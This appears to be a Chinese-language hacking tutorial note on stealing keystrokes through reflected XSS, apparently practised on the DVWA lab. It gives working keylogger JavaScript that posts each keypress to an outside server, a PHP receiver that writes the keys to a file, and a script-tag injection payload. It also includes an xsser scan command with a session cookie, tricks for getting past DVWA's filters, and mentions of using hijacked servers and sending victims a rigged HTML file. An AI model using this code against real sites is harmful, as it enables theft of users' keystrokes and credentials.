任务099:XSS- 键盘记录器和反射型XSS
-
进行xss利用进行键盘记录发送给黑客
黑客的服务器大部分但是用的肉鸡服务器
1 . 创建一个Keylogger.js文件
下面文件内容
意思就是将输入的内容发送给服务器http://192.168.55.26/keylogger.php
文件document.onkeypress = function(evt) { evt = evt || window.event key = String.fromCharCode(evt.charCode) if (key) { var http = new XMLHttpRequest(); var param = encodeURI(key) http.open("POST","http://192.168.55.26/keylogger.php",true); http.setRequestHeader("Content-type","application/x-www-form- urlencoded"); http.send("key="+param); } }
2. 在创建一个文件Keylogger.php代码用来接受键盘打的字保存到keylog.txt里
在将接受里的key参数也就是键盘输入的保存到keylog.txt文件里<?php $key=$_POST['key']; $logfile="keylog.txt"; $fp = fopen($logfile, "a"); fwrite($fp, $key); fclose($fp); ?>
3 . 创建一个写入的里的keylog.txt文件里的
电脑上创建keylog.txt文件来保存
4.的撒在有xss漏洞里执行<script+src="http://1.1.1.1/keylogger.js"></script>
在这个页面里键盘敲击过的任何字符都被盗走了
-
我们可以保存一个文件html文件叫别人大家就可以打开
这个就不
用Xsser工具
扫描参数
xsser -u "http://172.16.103.128/dvwa/vulnerabilities/xss_r/" -g "?name=XSS#" --cookie="security=low; PHPSESSID=b0889e2d4d984f2f185937c1b38d46c6" -s -v
也是可以发现xss漏洞
安全级别分析
- 安全级别1
发现他直接叫输入的内容显示出来了
- 安全级别2
他会吧带<script>
输出的时候过滤掉
这种安全方法也是可以破解的我们提交2个<script>
,应为他只过滤了一个
又被执行了
- 安全级别3
这个输出叫<变成<不代码本身的字符了,这个是安全的,但是也是可以进行如果我不使用<还是可以XSS的